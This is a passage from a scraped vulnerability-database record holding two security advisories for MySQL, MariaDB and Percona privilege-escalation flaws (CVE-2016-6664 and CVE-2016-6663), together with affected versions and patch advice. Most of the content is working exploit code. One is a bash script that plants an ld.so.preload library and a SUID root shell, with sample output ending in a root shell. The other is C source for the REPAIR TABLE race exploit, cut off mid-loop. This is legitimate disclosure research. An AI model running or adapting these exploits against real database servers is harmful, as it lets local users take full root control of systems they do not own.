privilege escalation could be triggered instantly (without the need to wait \nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \nkilling the mysqld child process (launched by the mysqld_safe wrapper). \n \nWhen the mysqld process gets terminated, the wrapper will then re-itertate the \nloop shown above and immediately create a mysql-owned file in the location \nspecified by the attacker in the symlink thus allowing attackers to quickly \nescalate their privileges. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n-------[ mysql-chowned.sh ]------ \n \n#!/bin/bash -p \n# \n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \n# mysql-chowned.sh (ver. 1.0) \n# \n# CVE-2016-6664 / OCVE-2016-5617 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# dawid[at]legalhackers.com \n# \n# https://legalhackers.com \n# \n# Follow https://twitter.com/dawid_golunski for updates on this advisory. \n# \n# This PoC exploit allows attackers to (instantly) escalate their privileges \n# from mysql system account to root through unsafe error log handling. \n# The exploit requires that file-based logging has been configured (default). \n# To confirm that syslog logging has not been enabled instead use: \n# grep -r syslog /etc/mysql \n# which should return no results. \n# \n# This exploit can be chained with the following vulnerability: \n# CVE-2016-6663 / OCVE-2016-5616 \n# which allows attackers to gain access to mysql system account (mysql shell). \n# \n# In case database server has been configured with syslog you may also use: \n# CVE-2016-6662 as an alternative to this exploit. \n# \n# Usage: \n# ./mysql-chowned.sh path_to_error.log \n# \n# \n# See the full advisory for details at: \n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n# \n# Video PoC: \n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. \n# \n \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/mysqlrootsh\" \nPRIVESCLIB=\"/tmp/privesclib.so\" \nPRIVESCSRC=\"/tmp/privesclib.c\" \nSUIDBIN=\"/usr/bin/sudo\" \n \nfunction cleanexit { \n# Cleanup \necho -e \"\\n[+] Cleaning up...\" \nrm -f $PRIVESCSRC \nrm -f $PRIVESCLIB \nrm -f $ERRORLOG \ntouch $ERRORLOG \nif [ -f /etc/ld.so.preload ]; then \necho -n > /etc/ld.so.preload \nfi \necho -e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \n \nfunction ctrl_c() { \necho -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n \n#intro \necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\" \necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\" \n \n# Args \nif [ $# -lt 1 ]; then \necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\" \necho -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\" \nexit 3 \nfi \n \n# Priv check \n \necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\" \nid | grep -q mysql \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\" \nexit 3 \nfi \n \n# Set target paths \nERRORLOG=\"$1\" \nif [ ! -f $ERRORLOG ]; then \necho -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\\n\" \nexit 3 \nfi \necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\" \n \n# [ Active exploitation ] \n \ntrap ctrl_c INT \n# Compile privesc preload library \necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\" \ncat <<_solibeof_>$PRIVESCSRC \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <dlfcn.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n \nuid_t geteuid(void) { \nstatic uid_t (*old_geteuid)(); \nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\"); \nif ( old_geteuid() == 0 ) { \nchown(\"$BACKDOORPATH\", 0, 0); \nchmod(\"$BACKDOORPATH\", 04777); \n//unlink(\"/etc/ld.so.preload\"); \n} \nreturn old_geteuid(); \n} \n_solibeof_ \n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\" \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\" \ncleanexit 2; \nfi \n \n \n# Prepare backdoor shell \ncp $BACKDOORSH $BACKDOORPATH \necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\" \n \n# Safety check \nif [ -f /etc/ld.so.preload ]; then \necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\" \nexit 2 \nfi \n \n# Symlink the log file to /etc \nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\" \n \n# Wait for MySQL to re-open the logs \necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\" \nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER \nif [ \"$THE_ANSWER\" = \"y\" ]; then \necho -e \"Got it. Executing 'killall mysqld' now...\" \nkillall mysqld \nfi \nwhile :; do \nsleep 0.1 \nif [ -f /etc/ld.so.preload ]; then \necho $PRIVESCLIB > /etc/ld.so.preload \nrm -f $ERRORLOG \nbreak; \nfi \ndone \n \n# /etc/ dir should be owned by mysql user at this point \n# Inject the privesc.so shared library to escalate privileges \necho $PRIVESCLIB > /etc/ld.so.preload \necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\" \necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\" \necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\" \nchmod 755 /etc/ld.so.preload \n \n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) \necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\" \nsudo 2>/dev/null >/dev/null \n \n#while :; do \n# sleep 0.1 \n# ps aux | grep mysqld | grep -q 'log-error' \n# if [ $? -eq 0 ]; then \n# break; \n# fi \n#done \n \n# Check for the rootshell \nls -l $BACKDOORPATH \nls -l $BACKDOORPATH | grep rws | grep -q root \nif [ $? -eq 0 ]; then \necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\" \necho -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\" \nelse \necho -e \"\\n[!] Failed to get root\" \ncleanexit 2 \nfi \n \n \n# Execute the rootshell \necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! \\n\" \n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\" \n$BACKDOORPATH -p \n \n# Job done. \ncleanexit 0 \n \n \n \n------------EOF------------------ \n \n \nExample run \n~~~~~~~~~~~~~~~ \n \nmysql_suid_shell.MYD-4.3$ whoami \nmysql \n \nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server \niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server \niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries \n \nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \n \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0) \n \nCVE-2016-6664 / OCVE-2016-5617 \n \nDiscovered and coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n[+] Starting the exploit as \nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) \n \n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err \n \n[+] Compiling the privesc shared library (/tmp/privesclib.c) \n \n[+] Backdoor/low-priv shell installed at: \n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \n[+] Symlink created at: \nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload \n \n[+] Waiting for MySQL to re-open the logs/MySQL service restart... \nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y \nGot it. Executing 'killall mysqld' now... \n \n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload \n \n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload \n \n[+] The /etc/ld.so.preload file now contains: \n/tmp/privesclib.so \n \n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! \n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \n[+] Rootshell got assigned root SUID perms at: \n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh \n \nGot root! The database server has been ch-OWNED ! \n \n[+] Spawning the rootshell /tmp/mysqlrootsh now! \n \nmysqlrootsh-4.3# whoami \nroot \n \nmysqlrootsh-4.3# exit \nexit \n \n[+] Cleaning up... \n \n[+] Job done. Exiting with code 0 \n \n \n \nVideo PoC: \n~~~~~~~~~~~~ \n \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAlthough the severity of this issue is lower on its own (attackers need to \ngain access to mysql system user), the vulnerability could easily be combined \nwith the CVE-2016-6663 issue. \nThe combination of the two would effectively allow low privileged local \ndatabase users to escalate their system privileges to root system account and \nallow them to fully compromise the server which increases the severity of this \nissue. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nMariaDB \nAll current \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \nVIII. SOLUTION \n------------------------- \n \nVendors have released patches after private disclosure. \nUpdate to the latest version of your DBMS. \n \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nThis advisory: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \nExploit source code: \nhttp://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh \n \nRelated mysql vulnerabilities discovered by the author of thid advisory that can be chained with \nthe CVE-2016-6664 vulnerability: \n \nCVE-2016-6663: \nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \nCVE-2016-6662: \nhttp://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html \n \n \nVideo PoC: \nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \nCVE-2016-6664 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 \n \nOracle CPU: \nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL \n \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \n \nhttp://legalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n01.11.2016 - Advisory released \n \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139491/mysql-chowned.txt"}, {"lastseen": "2016-12-05T22:22:18", "description": "", "published": "2016-11-02T00:00:00", "type": "packetstorm", "title": "MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6663", "CVE-2016-5617", "CVE-2016-6664", "CVE-2016-5616", "CVE-2016-6662"], "modified": "2016-11-02T00:00:00", "id": "PACKETSTORM:139476", "href": "https://packetstormsecurity.com/files/139476/MySQL-MariaDB-PerconaDB-Privilege-Escalation-Race-Condition.html", "sourceData": "`============================================= \n- Release date: 01.11.2016 \n- Discovered by: Dawid Golunski \n- Severity: Critical \n- CVE-2016-6663 / OCVE-2016-5616 \n- http://legalhackers.com \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nMySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition \n \n \nMariaDB \n< 5.5.52 \n< 10.1.18 \n< 10.0.28 \n \nMySQL \n<= 5.5.51 \n<= 5.6.32 \n<= 5.7.14 \n \nPercona Server \n< 5.5.51-38.2 \n< 5.6.32-78-1 \n< 5.7.14-8 \n \nPercona XtraDB Cluster \n< 5.6.32-25.17 \n< 5.7.14-26.17 \n< 5.5.41-37.0 \n \n \nII. BACKGROUND \n------------------------- \n \n \nMySQL: \n \n\"MySQL is the world's most popular open source database. \nWhether you are a fast growing web property, technology ISV or large \nenterprise, MySQL can cost-effectively help you deliver high performance, \nscalable database applications.\" \n \n\"Many of the world's largest and fastest-growing organizations including \nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time \nand money powering their high-volume Web sites, business-critical systems and \npackaged software.\" \n \nhttp://www.mysql.com/products/ \nhttp://www.mysql.com/why-mysql/ \n \n-- \n \nMariaDB: \n \n\"MariaDB is one of the most popular database servers in the world. \nIt's made by the original developers of MySQL and guaranteed to stay open source. \nNotable users include Wikipedia, WordPress.com and Google. \n \nMariaDB turns data into structured information in a wide array of applications, \nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \nstorage engines, plugins and many other tools make it very versatile for a wide \nvariety of use cases.\" \n \nhttps://mariadb.org/about/ \n \n-- \n \nPerconaDB: \n \n\"Percona Server for MySQLAA(r) is a free, fully compatible, enhanced, open source \ndrop-in replacement for MySQL that provides superior performance, scalability \nand instrumentation. \nWith over 3,000,000 downloads, Percona Server's self-tuning algorithms and support \nfor extremely high-performance hardware delivers excellent performance and reliability.\" \n \nhttps://www.percona.com/software/mysql-database/percona-server \n \n \nIII. INTRODUCTION \n------------------------- \n \nAn independent research has revealed a race condition vulnerability which is \npresent in MySQl, MariaDB and PerconaDB databases. \n \nThe vulnerability can allow a local system user with access to the affected \ndatabase in the context of a low-privileged account (CREATE/INSERT/SELECT grants) \nto escalate their privileges and execute arbitrary code as the database system \nuser (typically 'mysql'). \n \nSuccessful exploitation would allow an attacker to gain access to all of the \ndatabases stored on the affected database server. \n \nThe obtained level of access upon the exploitation, could be chained with \nthe other privilege escalation vulnerabilities discovered by the author of \nthis advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges \nfrom mysql user to root user and thus allow attackers to fully compromise the \ntarget server. \n \n \nIV. DESCRIPTION \n------------------------- \n \n \nTable locations \n~~~~~~~~~~~~~~~~~ \n \nMySQL-based databases allow users with CREATE table privilege to optionally \nspecify a disk path of the directory where the table will be stored via a DATA \nDIRECTORY parameter in the CREATE statement. \n \nUsers who have access to a database account with CREATE grant could create a \ntable under a directory that they can control. For example: \n \nattacker@debian:~$ mkdir /tmp/disktable \nattacker@debian:~$ chmod 777 /tmp/disktable/ \nattacker@debian:~$ ls -ld /tmp/disktable/ \ndrwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ \n \nA user could then place a table within the directory with the following SQL \nstatement: \n \nmysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; \n \nwhich would result in creating the following table file: \n \nattacker@debian:~$ ls -l /tmp/disktable/ \ntotal 0 \n-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD \n \n \nRace Condition \n~~~~~~~~~~~~~~~~~ \n \nObserving file operations performed on the table stored within the directory, \nit was discovered that REPAIR TABLE SQL statement which is available to \nlow-privileged users with SELECT/CREATE/INSERT grants, performed unsafe \noperations on temporary files created during the table repair process. \n \nExecuting the statement: \n \nmysql> REPAIR TABLE `poctab1`; \n+----------------+--------+----------+----------+ \n| Table | Op | Msg_type | Msg_text | \n+----------------+--------+----------+----------+ \n| testdb.poctab1 | repair | status | OK | \n+----------------+--------+----------+----------+ \n \nwould result in execution of the following system calls: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] open(\"/tmp/disktable/poctab1.MYD\", O_RDWR) = 65 \n[pid 1463] access(\"./testdb/poctab1.TRG\", F_OK) = -1 ENOENT (No such file or directory) \n[pid 1463] lseek(65, 0, SEEK_CUR) = 0 \n[pid 1463] lseek(65, 0, SEEK_END) = 0 \n[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 \n[pid 1463] open(\"/tmp/disktable/poctab1.TMD\", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 \n[pid 1463] lseek(65, 0, SEEK_END) = 0 \n[pid 1463] lseek(64, 0, SEEK_END) = 1024 \n[pid 1463] close(65) = 0 \n[pid 1463] close(66) = 0 \n[pid 1463] lstat(\"/tmp\", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 \n[pid 1463] lstat(\"/tmp/disktable\", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] stat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0 \n[pid 1463] chown(\"/tmp/disktable/poctab1.TMD\", 110, 115) = 0 \n[pid 1463] unlink(\"/tmp/disktable/poctab1.MYD\") = 0 \n[pid 1463] rename(\"/tmp/disktable/poctab1.TMD\", \"/tmp/disktable/poctab1.MYD\") = 0 \n \n \nThe first call: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n \nwas found to check file permissions of poctab1.MYD table which are then copied with chmod() \nto the newly created poctab1.TMD temporary file containing the repaired table. \n \nThe code is vulnerable to Race Condition between the call: \n \n[pid 1463] lstat(\"/tmp/disktable/poctab1.MYD\", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 \n \nand \n \n[pid 1463] chmod(\"/tmp/disktable/poctab1.TMD\", 0660) = 0 \n \n \nIf an attacker managed to unlink the temporary table poctab1.TMD and replace it \nwith a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), \nthey would be able to apply arbitrary permissions on the data directory. \nThe attacker would be able to control the set of permissions by pre-setting them on \npoctab1.MYD file before executing the REPAIR TABLE statement. \nFor example, by setting the permissions of poctab1.MYD to 777 the data directory \nwould become readable and writable to the attacker. \n \n \nObtaining mysql-suid shell \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nApart from gaining access to arbitrary mysql files, the attacker could also \nachieve arbitrary code execution in the context of mysql user (mysql shell). \n \nThis could be done by first pre-setting permissions on poctab1.MYD to 04777 \n(suid), and winning the race so that the permissions get applied on a copy \nof a bash shell file through the vulnerable chmod() call effectively creating \na shell that elevates their permissions after execution. \n \nThere is only one problem. Their suid shell would remain to be owned by the \nattacker's user id and not 'mysql' user. \n \nTo elevate their privileges, attacker would need to copy the bash shell to a \nmysql-owned table file which are owned by mysql user. However mysql table \nfiles are not writable by other users making it impossible for attacker to save \nthe shell. \n \nThis could be bypassed if attacker created a specially crafted directory \nwith a group sticky bit and then created a second table named 'poctab2' as \nfollows: \n \nattacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ \nattacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ \ndrwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ \n \nmysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; \nQuery OK, 0 rows affected (0.00 sec) \n \nattacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ \ntotal 0 \n-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD \n-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD \n \nAs we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions \nof the group on disktable directory) has 'mysql' as the owner but 'attacker' \nas the group. \nTherefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file \nand preserve the file owner. \n \nFinally, they could exploit the Race Condition again and have SUID + exec \npermissions applied on poctab2.MYD which would then allow them to execute the suid \nshell with elevated privileges of the mysql user. \n \n \nFrom mysql to root \n~~~~~~~~~~~~~~~~~~~~~~~ \n \nAfter obtaining a mysql suid shell, attackers could then exploit one of the \nother MySQL vulnerabilities discovered by the author of this advisory: \n \nCVE-2016-6662 \nor \nCVE-2016-6664 (OCVE-2016-5617) \n \nto escalate their privileges from mysql user to root system user. \n \nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n------------------[ mysql-privesc-race.c ]-------------------- \n \n/* \n \nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit \nmysql-privesc-race.c (ver. 1.0) \n \nCVE-2016-6663 / OCVE-2016-5616 \n \nDiscovered/Coded by: \n \nDawid Golunski \ndawid[at]legalhackers.com \nhttps://legalhackers.com \n \nFollow https://twitter.com/dawid_golunski for updates on this advisory. \n \n \nCompile: \ngcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient \n \nNote: \n* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads) \n \n* For testing purposes only. Do no harm. \n \nFull advisory URL: \nhttps://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html \n \nVideo PoC: \nhttps://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html \n \n*/ \n \n \n \n \n#include <fcntl.h> \n#include <grp.h> \n#include <mysql.h> \n#include <pwd.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/inotify.h> \n#include <sys/stat.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <time.h> \n#include <unistd.h> \n \n \n#define EXP_PATH \"/tmp/mysql_privesc_exploit\" \n#define EXP_DIRN \"mysql_privesc_exploit\" \n#define MYSQL_TAB_FILE EXP_PATH \"/exploit_table.MYD\" \n#define MYSQL_TEMP_FILE EXP_PATH \"/exploit_table.TMD\" \n \n#define SUID_SHELL EXP_PATH \"/mysql_suid_shell.MYD\" \n \n#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary \n \nMYSQL *conn; // DB handles \nMYSQL_RES *res; \nMYSQL_ROW row; \n \nunsigned long cnt; \n \n \nvoid intro() { \n \nprintf( \n\"\\033[94m\\n\" \n\"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\\n\" \n\"mysql-privesc-race.c (ver. 1.0)\\n\\n\" \n\"CVE-2016-6663 / OCVE-2016-5616\\n\\n\" \n\"For testing purposes only. Do no harm.\\n\\n\" \n\"Discovered/Coded by:\\n\\n\" \n\"Dawid Golunski \\n\" \n\"http://legalhackers.com\" \n\"\\033[0m\\n\\n\"); \n \n} \n \nvoid usage(char *argv0) { \nintro(); \nprintf(\"Usage:\\n\\n%s user pass db_host database\\n\\n\", argv0); \n} \n \nvoid mysql_cmd(char *sql_cmd, int silent) { \n \nif (!silent) { \nprintf(\"%s \\n\", sql_cmd); \n} \nif (mysql_query(conn, sql_cmd)) { \nfprintf(stderr, \"%s\\n\", mysql_error(conn)); \nexit(1); \n} \nres = mysql_store_result(conn); \nif (res>0) mysql_free_result(res); \n \n} \n \n \nint main(int argc,char **argv) \n{ \n \nint randomnum = 0; \nint io_notified = 0; \nint myd_handle; \nint wpid; \nint is_shell_suid=0; \npid_t pid; \nint status; \nstruct stat st; \n/* io notify */ \nint fd; \nint ret; \nchar buf[4096] __attribute__((aligned(8))); \nint num_read; \nstruct inotify_event *event; \n/* credentials */ \nchar *user = argv[1]; \nchar *password = argv[2]; \nchar *db_host = argv[3]; \nchar *database = argv[4]; \n \n \n// Disable buffering of stdout \nsetvbuf(stdout, NULL, _IONBF, 0); \n \n// Get the params \nif (argc!=5) { \nusage(argv[0]); \nexit(1); \n} \nintro(); \n// Show initial privileges \nprintf(\"\\n[+] Starting the exploit as: \\n\"); \nsystem(\"id\"); \n \n// Connect to the database server with provided credentials \nprintf(\"\\n[+] Connecting to the database `%s` as %s@%s\\n\", database, user, db_host); \nconn = mysql_init(NULL); \nif (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { \nfprintf(stderr, \"%s\\n\", mysql_error(conn)); \nexit(1); \n} \n \n// Prepare tmp dir \nprintf(\"\\n[+] Creating exploit temp directory %s\\n\", \"/tmp/\" EXP_DIRN); \numask(000); \nsystem(\"rm -rf /tmp/\" EXP_DIRN \" && mkdir /tmp/\" EXP_DIRN); \nsystem(\"chmod g+s /tmp/\" EXP_DIRN ); \n \n// Prepare exploit tables :) \nprintf(\"\\n[+] Creating mysql tables \\n\\n\"); \nmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 0); \nmysql_cmd(\"DROP TABLE IF EXISTS mysql_suid_shell\", 0); \nmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0); \nmysql_cmd(\"CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 0); \n \n// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file \n// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory \nprintf(\"\\n[+] Copying bash into the mysql_suid_shell table.\\n After the exploitation the following file/table will be assigned SUID and executable bits : \\n\"); \nsystem(\"cp /bin/bash \" SUID_SHELL); \nsystem(\"ls -l \" SUID_SHELL); \n \n// Use inotify to get the timing right \nfd = inotify_init(); \nif (fd < 0) { \nprintf(\"failed to inotify_init\\n\"); \nreturn -1; \n} \nret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); \n \n \n/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ \n \nprintf(\"\\n[+] Entering the race loop... Hang in there...\\n\"); \n \nwhile ( is_shell_suid != 1 ) { \n \ncnt++; \nif ( (cnt % 100) == 0 ) { \nprintf(\"->\"); \n//fflush(stdout); \n} \n \n/* Create empty file , remove if already exists */ \nunlink(MYSQL_TEMP_FILE); \nunlink(MYSQL_TAB_FILE); \nmysql_cmd(\"DROP TABLE IF EXISTS exploit_table\", 1); \nmysql_cmd(\"CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '\" EXP_PATH \"'\", 1); \n \n/* random num if needed */ \nsrand ( time(NULL) ); \nrandomnum = ( rand() % MAX_DELAY ); \n \n// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink \npid = fork(); \nif (pid < 0) { \nfprintf(stderr, \"Fork failed :(\\n\"); \n} \n \n/* Child process - executes REPAIR TABLE SQL statement */ \nif (pid == 0) { \nusleep(500); \nunlink(MYSQL_TEMP_FILE); \nmysql_cmd(\"REPAIR TABLE exploit_table EXTENDED\", 1); \n// child stops here \nexit(0); \n} \n \n/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ \nif (pid > 0 ) { \nio_notified = 0; \n \nwhile (1) { \nint processed = 0; \nret = read(fd, buf, sizeof(buf)); \nif (ret < 0) { \nbreak; \n} \nwhile (processed < ret) { \nevent = (struct inotify_event *)(buf + processed); \nif (event->mask & IN_CLOSE) { \nif (!strcmp(event->name, \"exploit_table.TMD\")) { \n//usleep(randomnum); \n \n// Set the .MYD permissions to suid+exec before they get copied to the .TMD file \nunlink(MYSQL_TAB_FILE); \nmyd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); \nclose(myd_handle); \nchmod(MYSQL_TAB_FILE, 04777); \n \n// Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec \nunlink(MYSQL_TEMP_FILE); \nsymlink(SUID_SHELL, MYSQL_TEMP_FILE); \nio_notified=1; \n} \n} \nprocessed += sizeof(struct inotify_event); \n} \nif (io_notified) { \nbreak; \n} \n} \n \n \nwaitpid(pid, &status, 0); \n} \n \n// Check if SUID bit was set at the end of this attempt \nif ( lstat(SUID_SHELL, &st) == 0 ) { \nif (st.st_mode & S_ISUID) { \nis_shell_suid = 1; \n} \n} \n \n} \n \nprintf(\"\\n\\n[+] \\033[94mBingo! Race won (took %lu tries) 